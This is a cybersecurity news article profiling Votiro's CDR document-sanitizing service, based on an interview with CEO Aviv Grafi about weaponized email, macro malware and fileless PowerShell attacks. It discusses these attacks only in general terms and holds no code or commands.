NEW TECH: Votiro detects and deters ‘weaponized email’ that exploits PowerShell tool for stealth

By Byron V. Acohido

It’s hard to believe this month marks the 20th anniversary of the release of the devastating Melissa email virus which spread around the globe in March 1999.

Related: The ‘Golden Age’ of cyber espionage is upon us

Melissa was hidden in a weaponized Word document that arrived as an email attachment. When the recipient clicked on the Word doc, a macro silently executed instructions to send a copy of the email, including the infected attachment, to the first 50 people listed as Outlook contacts.

Unfortunately, despite steady advances in malware detection and intrusion prevention systems, and much effort put into training employees to be wary of suspicious email, weaponized email and document-based malware remain as virulent as pervasive as it was two decades ago.

The Defense Department, for instance, detects 36 million malware-infested emails arriving from hackers, terrorists and foreign adversaries every 24 hours. That translates into an onslaught of some 13 billion weaponized emails raining down on Pentagon on an annual basis. This gives you an idea of the steady flow of weaponized email attacks against companies of all sizes and in all sectors, with certain verticals, namely financial services, healthcare companies and tech firms bearing the brunt.

I had a revelatory discussion about this with Aviv Grafi, CEO of Votiro, at RSA 2019 in San Francisco last week. Votiro is a Tel Aviv-based security startup that is pioneering a new white-listing approach to help companies mitigate their exposure to weaponized email and document-distributed malware. For a full drill down, please listen to the accompanying podcast. The key takeaways:

Productivity vs. security

Threat actors fully grasp that humans will forever remain the weak link in any business network. And they’re accomplished at sidestepping the latest perimeter and near-perimeter defenses. Meanwhile, they’ve also become adept at manipulating widely-used, legitimate workplace tools, for instance, the macros and scripting capabilities added to products like Microsoft Word docs and Adobe PDF files.


“A lot of business today rely on using these basic tools on a daily basis, for HR to review resumes, to process insurance claims, to open up financial tables, all those kinds of things,” Grafi noted.

Employees today receive mixed messages. The work duties call for them to open and deal with business documents, “and at the same time the CSO actually may be directing them to think twice before they open any document,” Grafi says. “So, the challenge becomes productivity versus security.”

Meanwhile, sophisticated threat actors continue to rely on weaponized email and document-distributed malware as favored delivery vehicles. Granted, a high percentage of malicious software circulating in the wild is successfully filtered by advanced antivirus suites or gets detonated in sandboxes before they can do harm.

Effective attacks

Yet a steady volume of malicious code continues to get through. A typical successful attack works like this: a targeted victim is sent a tainted macro or PDF that arrives in an expertly-spoofed email message. The message entices the recipient to click on the tainted zip file or macro. This then drops a PowerShell script into the memory of the host computer.

PowerShell is a command-line shell that Microsoft began installing by default on all Windows machines a few years back. It was designed to make it convenient for system administrators to automate tasks and manage configurations across all Windows endpoints and servers in a company network.

By design, PowerShell, and other tools like it, lie inert and only execute in memory. They’re generally not detectable by legacy security technologies. Thus, they’ve become a favorite way for threat actors to stealthily download and execute snippets of malicious script. This is what is referred to as fileless attacks. And they’re not going to go away anytime soon.

“Macros have been here for 25 years now, and the challenge is that Microsoft will never get rid of macros because they’re so widely used for legitimate actions,” Grafi said. “Hackers are using these same capabilities to execute malicious code, with malicious intentions, and then, bam, you’re infected.”

White-listing approach

Prior to co-founding Votiro, Grafi traveled the globe as a penetration tester. His assignment often was to break into the client’s network in order to show them what needed to be shored up. One attack scenario never failed. Grafi told me he would check for job openings at the targeted company; do some research on LinkedIn to find the names of current employees; and then send the HR department an email with an infected resume attached, citing a reference from a current worker.

“I was successful 100 percent of the time, because the job of the HR department was to open the resume, I sent them,” he said.

This led to Grafi co-founding Votiro. The company delivers an innovative white-listing service, called CDR which takes a prevention, instead of detection, approach to disarming weaponized email and deterring document-delivered malware. CDR stands for “content, disarm and reconstruction.”

“Instead of looking for the bad stuff, we generate a safe version of every document,” he explained. “So, the HR department, which gets tons of resumes every day, can click on those documents and open them without needing to think twice.”

CDR is designed to give employee’s peace of mind. Grafi puts it this way: “It assures you’re getting a safe version of all documents. Everything that is relevant to the user’s experience has been vetted and verified as being valid, such as the text, the bookmarks and the images. And all of the unknown, nasty stuff will be kept outside. In less than one second, our technology provides a safe document across all channels.”

Given human nature — and the fact that the work tools we’re familiar with aren’t going to go away anytime soon — there’s room for Votiro’s white-listing approach. Hopefully, it will help slow the daily deluge of weaponized email and materially help to derail documented-distributed malware.

Talk more soon.


Pulitzer Prize-winning business journalist Byron V. Acohido is dedicated to fostering public awareness about how to make the Internet as private and secure as it ought to be.

(LW provides consulting services to the vendors we cover.)


Share on FacebookShare on Google+Tweet about this on TwitterShare on LinkedInEmail this to someone